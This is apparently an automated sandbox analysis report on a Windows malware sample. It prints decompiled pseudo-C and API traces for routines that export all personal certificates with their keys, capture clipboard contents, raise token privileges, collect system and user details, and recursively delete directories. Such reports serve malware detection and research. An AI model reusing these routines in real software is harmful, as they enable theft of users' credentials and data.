GetProcAddress.KERNEL32(?,?), ref: 00413EC3
FreeLibrary.KERNEL32(?), ref: 00413F4C

Part of subcall function 00409D62: GetCurrentThread.KERNEL32 ref: 00409D72
Part of subcall function 00409D62: OpenThreadToken.ADVAPI32(00000000,?,?,?,0040BD1D,SeSecurityPrivilege,00000000), ref: 00409D79
Part of subcall function 00409D62: OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,0040BD1D,SeSecurityPrivilege,00000000), ref: 00409D8B

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege), ref: 00413EE0

Part of subcall function 00413DE0: EqualSid.ADVAPI32(00000000,?,?), ref: 00413E05
Part of subcall function 00413DE0: CloseHandle.KERNEL32(?,?), ref: 00413E46

Strings

SeTcbPrivilege, xrefs: 00413ED6

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: SeTcbPrivilege
API String ID: 1107370034-1502394177
Opcode ID: b0546979fde6950b2cfa35f68351b851ba47a2cd0a2440eaa48a2e42614559a2
Instruction ID: b912b8d49fbfc60bcb5982d2c4414b226a02c333d8cd55fb985f6e63d1f4c9e4
Opcode Fuzzy Hash: b0546979fde6950b2cfa35f68351b851ba47a2cd0a2440eaa48a2e42614559a2
Instruction Fuzzy Hash: 58318A35E00218ABDF11AFA5CD409EFBB79EB44705F10046AF801F2210C7799E92CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409A27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(@,00000000,00000000,00000001,F0000040,00000000,0040E00D,?,?,-00000030,?,?,0040E526), ref: 00409A40
CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,0040E526), ref: 00409A58
CryptHashData.ADVAPI32(?,00000010), ref: 00409A74
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00409A8C
CryptDestroyHash.ADVAPI32(?), ref: 00409AA3
CryptReleaseContext.ADVAPI32(?,00000000,?,?,0040E526), ref: 00409AAD

Strings

@, xrefs: 00409A39, 00409A3C

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID: @
API String ID: 3186506766-1494960778
Opcode ID: 88786c6ffdd73510e00ee8504497c9bf2873f5648b5d31a1131c97a41a8cd5c9
Instruction ID: 83ddd963f20677dd7ab10c76fd64d47c1c701045ae7bda94e3f67f3d563b808a
Opcode Fuzzy Hash: 88786c6ffdd73510e00ee8504497c9bf2873f5648b5d31a1131c97a41a8cd5c9
Instruction Fuzzy Hash: C7111575900288BFEF119B90CD84EAE7B7DEB05344F408462F551B01A2C73A9E989F28

Uniqueness

Uniqueness Score: -1.00%

Function 00406F0A Relevance: 12.1, APIs: 8, Instructions: 120
encryptiontimeCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00406F0A(intOrPtr __eax) {
				char _v588;
				char _v716;
				char _v844;
				char _v885;
				intOrPtr _v892;
				intOrPtr _v893;
				char _v896;
				char _v900;
				char _v901;
				char _v904;
				char _v908;
				struct _SYSTEMTIME _v924;
				intOrPtr _v928;
				intOrPtr _v940;
				intOrPtr _v944;
				char _v949;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t34;
				intOrPtr _t40;
				void* _t63;
				WCHAR* _t67;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t73;
				intOrPtr* _t75;
				char* _t76;
				intOrPtr* _t77;
				char* _t78;

				_v885 = 0;
				__imp__CertOpenSystemStoreW(0, L"MY", _t69, _t73, _t63);
				_v892 = __eax;
				if(__eax == 0) {
					L13:
					return _v893;
				}
				_t75 = __imp__CertEnumCertificatesInStore;
				_t71 = 0;
				_t33 =  *_t75(__eax, 0);
				if(_t33 == 0) {
					L4:
					_v901 = 1;
					L12:
					__imp__CertCloseStore(_v900, 0);
					goto L13;
				} else {
					goto L2;
				}
				do {
					L2:
					_t71 = _t71 + 1;
					_t33 =  *_t75(_v900, _t33);
				} while (_t33 != 0);
				if(_t71 != 0) {
					_t76 =  &_v896;
					_t34 = 0x7f;
					_v900 = 0;
					_v904 = 0;
					E00412F05(_t34, _t76);
					_push(4);
					_push(0);
					_t77 = __imp__PFXExportCertStoreEx;
					_push(_t76);
					_push( &_v904);
					_push(_v908);
					if( *_t77() != 0) {
						_t40 = E0040865F(_v924.wYear);
						_v924.wDayOfWeek = _t40;
						if(_t40 != 0) {
							_push(4);
							_push(0);
							_push( &(_v924.wHour));
							_push( &_v924);
							_push(_v928);
							if( *_t77() != 0) {
								_t67 =  &_v844;
								E00408A32(_t43 | 0xffffffff, L"MY", _t67);
								CharLowerW(_t67);
								GetSystemTime( &_v924);
								_t78 =  &_v908;
								E00412F05(0x80, _t78);
								E00406EAC( &_v588, L"MY");
								_push(_v924.wYear & 0x0000ffff);
								_push(_v924.wMonth & 0x0000ffff);
								_push(_v924.wDay & 0x0000ffff);
								_push( &_v844);
								_push( &_v588);
								_push(_t78);
								_t68 = 0x3e;
								if(E00409450(_t78, _t68,  &_v716) > 0 && E0041393A(L"MY", _t68, 2, L"MY",  &_v716, _v940, _v944) != 0) {
									_v949 = 1;
								}
							}
							E0040868F(_v940);
						}
					}
					goto L12;
				}
				goto L4;
			}

0x00406f21
0x00406f25
0x00406f2b
0x00406f31
0x00407072
0x0040707c
0x0040707c
0x00406f37
0x00406f3f
0x00406f41
0x00406f45
0x00406f57
0x00406f57
0x00407067
0x0040706c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f47
0x00406f47
0x00406f4c
0x00406f4d
0x00406f4f
0x00406f55
0x00406f63
0x00406f67
0x00406f68
0x00406f6c
0x00406f70
0x00406f75
0x00406f77
0x00406f7a
0x00406f80
0x00406f85
0x00406f86
0x00406f8e
0x00406f98
0x00406f9d
0x00406fa3
0x00406fa9
0x00406fab
0x00406fb0
0x00406fb5
0x00406fb6
0x00406fbe
0x00406fcc
0x00406fd0
0x00406fd8
0x00406fe3
0x00406fe9
0x00406ff2
0x00406ffe
0x00407008
0x0040700e
0x00407014
0x0040701c
0x00407024
0x00407027
0x0040702a
0x0040703c
0x00407059
0x00407059
0x0040703c
0x00407062
0x00407062
0x00406fa3
0x00000000
0x00406f8e
0x00000000

APIs

CertOpenSystemStoreW.CRYPT32(00000000,004031F4), ref: 00406F25
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00406F41
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00406F4D
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00406F8A
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00406FBA
CharLowerW.USER32 ref: 00406FD8
GetSystemTime.KERNEL32(?), ref: 00406FE3
CertCloseStore.CRYPT32(?,00000000), ref: 0040706C

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: 3bcf70d38450c1cfb38d5393f87229826167013d5947c93b96aac8b2581f9b8a
Instruction ID: 375acdae203b834d2069a99fd61a9069af83dc9910e754c5858f4bacd13c7da7
Opcode Fuzzy Hash: 3bcf70d38450c1cfb38d5393f87229826167013d5947c93b96aac8b2581f9b8a
Instruction Fuzzy Hash: 8141B671508245ABD710AF65DD81AABBBDCAB88708F00093EB6C8F21A1DA78D9458766

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE68 Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040DE68(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E0040DFC5("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E0040DBC6( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= 0) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0040DFC5( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E0040DE68( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x0040de85
0x0040de89
0x0040de8d
0x0040de94
0x0040dfbc
0x0040dfc2
0x0040dfc2
0x0040dea7
0x0040dead
0x0040deb4
0x0040deba
0x0040dec3
0x0040dec3
0x0040dec8
0x00000000
0x00000000
0x0040deea
0x0040df9b
0x0040dfac
0x00000000
0x00000000
0x00000000
0x0040dfac
0x0040def4
0x0040def7
0x0040df00
0x00000000
0x00000000
0x00000000
0x00000000
0x0040df07
0x0040df07
0x0040df0b
0x0040df48
0x0040df4d
0x0040df6d
0x0040df71
0x0040df76
0x0040df76
0x0040df96
0x0040df96
0x00000000
0x0040df4d
0x0040df0d
0x0040df23
0x0040df27
0x00000000
0x00000000
0x00000000
0x0040df29
0x0040df36
0x0040df39
0x0040df3b
0x00000000
0x00000000
0x0040df3d
0x0040df41
0x0040df46
0x0040df46
0x00000000
0x0040df41
0x0040def7
0x0040dfb6
0x0040dfb6

APIs

Part of subcall function 0040DFC5: PathCombineW.SHLWAPI(?,?,?,0041A149,?,004218C8,00000000,00000032,?), ref: 0040DFE5

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040DEA7
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040DECE
PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040DF19
Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0040DF46
Sleep.KERNEL32(00000000,?,?), ref: 0040DF76
FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040DFA4
FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040DFB6

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: 3b6a6b557c977930e11baa8af19224a4981de5b2a6d6d8ccf68d0549ac167c9f
Instruction ID: b96796990030a9f61261b7e7673872512ea4f8766b2b260729689a4c467b4c28
Opcode Fuzzy Hash: 3b6a6b557c977930e11baa8af19224a4981de5b2a6d6d8ccf68d0549ac167c9f
Instruction Fuzzy Hash: AB41A33180420A9FCF21DF94DC44ADFBBA5EF94344F00843AF995A22E1D339D859CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00409D62 Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409D62(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

0x00409d6d
0x00409d81
0x00409da0
0x00409da8
0x00409db7
0x00409dd8
0x00409dd8
0x00409ddd
0x00000000
0x00409d95
0x00000000
0x00409d95

APIs

GetCurrentThread.KERNEL32 ref: 00409D72
OpenThreadToken.ADVAPI32(00000000,?,?,?,0040BD1D,SeSecurityPrivilege,00000000), ref: 00409D79
OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,0040BD1D,SeSecurityPrivilege,00000000), ref: 00409D8B
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00409DAF
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00409DC4
GetLastError.KERNEL32 ref: 00409DCE
CloseHandle.KERNEL32(?), ref: 00409DDD

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: 2360a7ccee03ab7b71b613f899130007aa38ca3b00cd415aba2db5d7d4f0fed4
Instruction ID: a6edda3359089dc566b505c3494ad2923fec85b7866af5ee5283ef2edcc3aab7
Opcode Fuzzy Hash: 2360a7ccee03ab7b71b613f899130007aa38ca3b00cd415aba2db5d7d4f0fed4
Instruction Fuzzy Hash: C10129B5540209BFEB00AFA19D89AEB7BACEF15345F04407AF501F11A1E7348D849A28

Uniqueness

Uniqueness Score: -1.00%

Function 00413091 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00413091(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t114 =  *_t111;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E0040E022(_t114);
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if((_a8 & 0x00000001) == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x2000800;
						_t99 = E0040E036(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E0040868F( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E00412FDD(_t106, _t111, 2);
									E00412FDD(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 > 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E0040E0E3(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_push( &_a4);
								_t64 =  &_v588;
								_push(_t64);
								_push(2);
								L0041C13E();
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 > 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E0040E0E3(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E00406D85(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E0040E036(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E0040E036(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00408791();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E0040E036(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E004087B9();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E0040E036(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E0040E036(_t111, _t104);
					goto L16;
				}
				_t92 = E0041A08B(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E0040E0E3(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E0041A1EB( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E0040E0E3(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

0x00413091
0x00413091
0x0041309c
0x0041309f
0x004130a3
0x004130a5
0x004130a9
0x004130ab
0x004130b0
0x004130b4
0x00000000
0x004130b6
0x004130bd
0x004130bd
0x004130c1
0x004130ca
0x00413113
0x00413113
0x00413117
0x0041311c
0x0041311d
0x0041311e
0x00413125
0x00413128
0x00413134
0x00413134
0x00413136
0x00413136
0x0041313a
0x004131af
0x004131af
0x004131b1
0x004132b3
0x004132b3
0x004132b7
0x004132bb
0x004132c0
0x004132c0
0x004132c0
0x004132c3
0x00000000
0x004132c3
0x004131b7
0x004131bb
0x00413209
0x00413209
0x0041320b
0x00000000
0x00000000
0x00413211
0x00413215
0x00413294
0x00413294
0x00413296
0x00000000
0x00000000
0x00413298
0x0041329c
0x004132a1
0x004132a9
0x004132a9
0x00000000
0x0041329c
0x00413225
0x0041322b
0x0041322e
0x00413230
0x00413232
0x00413239
0x00413242
0x0041324d
0x0041324d
0x0041324f
0x00413256
0x00413258
0x00000000
0x0041325a
0x0041325d
0x0041325e
0x00413264
0x00413265
0x00413267
0x0041326c
0x0041326e
0x00413270
0x00413273
0x00413275
0x00413277
0x0041327e
0x00413287
0x00413292
0x00413292
0x00413275
0x00000000
0x0041326e
0x00413258
0x004131bd
0x004131c0
0x004131c7
0x004131cb
0x004131cc
0x004131d3
0x004131d4
0x004131d9
0x004131db
0x004131dd
0x004132b0
0x00000000
0x004132b0
0x004131e3
0x004131ec
0x004131f2
0x004131f6
0x004131f7
0x004131fe
0x004131ff
0x00413204
0x00413207
0x00000000
0x00413207
0x0041313c
0x0041313e
0x00000000
0x00000000
0x00413149
0x0041314f
0x00413150
0x00413151
0x00413158
0x00413160
0x00413162
0x00413164
0x00000000
0x00000000
0x0041316f
0x00413175
0x00413176
0x00413177
0x0041317e
0x00413186
0x00413188
0x0041318a
0x00000000
0x00000000
0x00413196
0x0041319c
0x0041319d
0x0041319e
0x004131a5
0x004131ad
0x00000000
0x004131ad
0x004130d3
0x004130de
0x004130e9
0x004130eb
0x004130ed
0x00000000
0x00000000
0x004130f3
0x004130f8
0x004130fd
0x00413105
0x0041310d
0x0041310d
0x0041310f
0x00413111
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00413190
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,?,?,00000000), ref: 004131E3
GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,?,00000000), ref: 00413225
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00413267

Strings

, xrefs: 00413298

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-3916222277
Opcode ID: ba7065d30adf445897054dbe36c9230d98320d678e458753a2068f4480c72534
Instruction ID: b413615fabd61af32226196e8469ea3179ec65f243426be387a5a6ef9a326ba1
Opcode Fuzzy Hash: ba7065d30adf445897054dbe36c9230d98320d678e458753a2068f4480c72534
Instruction Fuzzy Hash: BE51D931A4025479D721EF65D849BDE7BA89F01704F04449BFE45AF2C2D7B98BC8CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B12F Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041B12F(void* _a4) {
				signed int _t11;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t25;

				_t25 = _a4;
				_t23 = GetClipboardData(_t25);
				_a4 = _t23;
				if(E00419F02() == 0) {
					return _t23;
				}
				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
					L20:
					return _a4;
				} else {
					_t21 = GlobalLock(_t23);
					if(_t21 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t25 - 1;
					if(_t11 == 0) {
						_push(_t21);
						_push(0);
						L12:
						_t24 = E004088D2(_t11 | 0xffffffff);
						L15:
						if(_t24 != 0) {
							EnterCriticalSection(0x421da4);
							E0041AE24(0x4045d4);
							E0041AE24(_t24);
							LeaveCriticalSection(0x421da4);
							if(_t24 != _t21) {
								E0040868F(_t24);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t11 = _t11 - 6;
					if(_t11 == 0) {
						_push(_t21);
						_push(1);
						goto L12;
					}
					if(_t11 != 6) {
						_t24 = _a4;
					} else {
						_t24 = _t21;
					}
					goto L15;
				}
			}

0x0041b133
0x0041b13e
0x0041b140
0x0041b14a
0x00000000
0x0041b14c
0x0041b155
0x0041b1dd
0x00000000
0x0041b16a
0x0041b172
0x0041b176
0x0041b1dc
0x00000000
0x0041b1dc
0x0041b17a
0x0041b17b
0x0041b19a
0x0041b19b
0x0041b18e
0x0041b196
0x0041b1a2
0x0041b1a4
0x0041b1ac
0x0041b1b7
0x0041b1bd
0x0041b1c3
0x0041b1cb
0x0041b1ce
0x0041b1ce
0x0041b1cb
0x0041b1d6
0x00000000
0x0041b1d6
0x0041b17d
0x0041b180
0x0041b18b
0x0041b18c
0x00000000
0x0041b18c
0x0041b185
0x0041b19f
0x0041b187
0x0041b187
0x0041b187
0x00000000
0x0041b185

APIs

GetClipboardData.USER32 ref: 0041B138

Part of subcall function 00419F02: WaitForSingleObject.KERNEL32(00000000,0040506D,00405103,00000000), ref: 00419F0A

GlobalLock.KERNEL32 ref: 0041B16C
EnterCriticalSection.KERNEL32(00421DA4,00000000,00000000), ref: 0041B1AC
LeaveCriticalSection.KERNEL32(00421DA4,00000000,004045D4), ref: 0041B1C3
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 0041B1D6

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
String ID:
API String ID: 1109978993-0
Opcode ID: cb9c9888c8efb7fcc52c35a62b0bfa0be6c8703bebb5d958c8cbb6899fc05b10
Instruction ID: 5fc47fab25ffabef1b7b49f0046636707c2fefc5ea5d7a3c1457de6012d1c7c7
Opcode Fuzzy Hash: cb9c9888c8efb7fcc52c35a62b0bfa0be6c8703bebb5d958c8cbb6899fc05b10
Instruction Fuzzy Hash: 8211E7335001157BC6112A299DA8AFF3659DB853D4B1B413BF909B7360CB7C8CC142EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDAD Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DDAD(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E0040DFC5("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0040DBC6( &(_v596.cFileName)) == 0 && E0040DFC5( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E0040DA97( &_v1116);
						} else {
							E0040DDAD( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0040ddbb
0x0040ddcf
0x0040de4a
0x0040de50
0x0040de67
0x0040de67
0x0040dde4
0x0040dde9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ddeb
0x0040ddeb
0x0040ddf9
0x0040de11
0x0040de19
0x0040de2b
0x0040de1b
0x0040de1f
0x0040de1f
0x0040de19
0x0040de3f
0x0040de44
0x00000000

APIs

Part of subcall function 0040DFC5: PathCombineW.SHLWAPI(?,?,?,0041A149,?,004218C8,00000000,00000032,?), ref: 0040DFE5

FindFirstFileW.KERNEL32(?,?,?), ref: 0040DDDE
FindNextFileW.KERNEL32(00000000,?), ref: 0040DE39
FindClose.KERNEL32(00000000), ref: 0040DE44
SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040DE50
RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040DE57

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: 9d4ff8d4d48dc78a8082c039d0c2244b110445254dae3ddbdb144daa29d7d4e0
